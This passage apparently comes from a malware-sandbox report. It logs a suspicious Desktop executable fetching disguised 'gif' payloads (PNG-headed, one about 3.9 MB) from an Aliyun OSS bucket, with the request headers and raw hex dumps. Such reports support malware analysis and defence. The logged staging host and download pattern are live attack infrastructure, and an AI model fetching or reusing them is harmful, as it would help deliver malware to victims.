                                                                                          2025-01-11 03:43:47 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                                                                          Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                                                                          2025-01-11 03:43:47 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                                                                          Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                                                                          2025-01-11 03:43:47 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                                                                          Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                                                                          2025-01-11 03:43:47 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                                                                          Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                                                          2025-01-11 03:43:47 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                                                                          Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.94997639.103.20.1054437616C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:43:48 UTC111OUTGET /c.gif HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:43:49 UTC546INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:43:48 GMT
                                                                                          Content-Type: image/gif
                                                                                          Content-Length: 10681
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E8F40BFF4B3138A37EF4
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                                                          Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 10287299869673359293
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000104
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                                                          x-oss-server-time: 20
                                                                                          2025-01-11 03:43:49 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                          Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                          2025-01-11 03:43:49 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                                                                          Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                                                                          2025-01-11 03:43:49 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                                                                          Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.94997739.103.20.1054437616C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:43:50 UTC111OUTGET /d.gif HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:43:50 UTC547INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:43:50 GMT
                                                                                          Content-Type: image/gif
                                                                                          Content-Length: 3892010
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E8F651FCAD3536DE7014
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                                                          Last-Modified: Fri, 10 Jan 2025 12:31:05 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 3363616613234190325
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000104
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                                                          x-oss-server-time: 31
                                                                                          2025-01-11 03:43:50 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                          Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                          2025-01-11 03:43:50 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                                                          Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                                                          2025-01-11 03:43:50 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                                                          Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                                          2025-01-11 03:43:50 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                                                                          Data Ascii: -J;wuwu{}uG`uWu{Q6
                                                                                          2025-01-11 03:43:50 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                                                                          Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                                                                          2025-01-11 03:43:50 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                                                                          Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                                                                          2025-01-11 03:43:50 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                                                                          Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                                                                          2025-01-11 03:43:50 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                                                                          Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                                                                          2025-01-11 03:43:50 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                                                                          Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                                                                          2025-01-11 03:43:51 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                                                                          Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
